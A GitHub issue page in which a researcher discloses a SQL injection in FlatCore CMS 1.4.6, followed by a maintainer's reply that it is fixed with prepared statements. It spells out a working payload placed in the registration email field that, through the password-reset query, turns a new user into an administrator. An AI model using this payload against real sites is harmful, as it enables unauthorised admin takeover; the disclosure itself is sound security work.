Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

SQL Injection vulnerability (Users DB) on FlatCore v1.4.6 #29

Closed
shardulm94 opened this issue Apr 11, 2017 · 1 comment

Comments

Projects
None yet
2 participants
@shardulm94
Copy link

commented Apr 11, 2017

Exploit Title: SQL Injection vulnerability (Users DB) on FlatCore v1.4.6
Date: 11-April-2017
Exploit Author: @shardulm94
Software Link: https://github.com/flatCore/flatCore-CMS/archive/v1.4.6.zip
Version: 1.4.6

Description:
SQL Injection allows an attacker to run malicious SQL statements on a database and thus being able to read or modify the data in the database. With enough privileges assigned to the database user, it can allow the attacker to delete tables or drop databases.

Exploit:
The vulnerability is due to a non-parameterized SQL query at https://github.com/flatCore/flatCore-CMS/blob/master/core/password.php#L37. This vulnerability along with missing validation on the email field of the registration and password reset forms can be used to create an administrator account with full privileges. We assume that FlatCore is installed at http://localhost/flatcore/ and new registrations are enabled.

  1. Go to http://localhost/flatcore/register/. Fill in the username uname and some password. Fill in the email fields as '; UPDATE fc_user SET user_class='administrator', user_verified='verified', user_drm='||drm_acp_user|||||' WHERE user_nick='uname' --. This step is required since the password reset form checks for valid emails in the DB before reset.
  2. Since the register page uses parameterized query, the whole email string will be stored in the DB.
  3. Now go to http://localhost/flatcore/password/ and put in the email address mentioned while registering. Due to https://github.com/flatCore/flatCore-CMS/blob/master/core/password.php#L36, the query will effectively become UPDATE fc_user SET user_reset_psw = '$reset_token' WHERE user_mail = ''; UPDATE fc_user SET user_class='administrator', user_verified='verified', user_drm='||drm_acp_user|||||' WHERE user_nick='uname' --.
  4. As you can see, this will set administrator as the user class for now newly created user uname and will also give it permissions to manage the user management screen.
  5. Once inside the admin panel, the attacker can give himself extra privileges.

References:
https://www.owasp.org/index.php/SQL_Injection

Screenshots:
Registration Form
image
Password Reset
image
New user created and verified with ability to edit users
image
Logged in as new user and change privileges
image

Impact: Read and modify the users database
Mitigation: Use of Parameterized SQL Queries and Validation on email fields

patkon added a commit that referenced this issue Apr 12, 2017

@patkon

This comment has been minimized.

Copy link
Member

commented Apr 12, 2017

I've changed the SQL Queries to Prepared Statements and the E-Mail Adress will be validated.

@shardulm94 shardulm94 closed this Jun 14, 2017

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.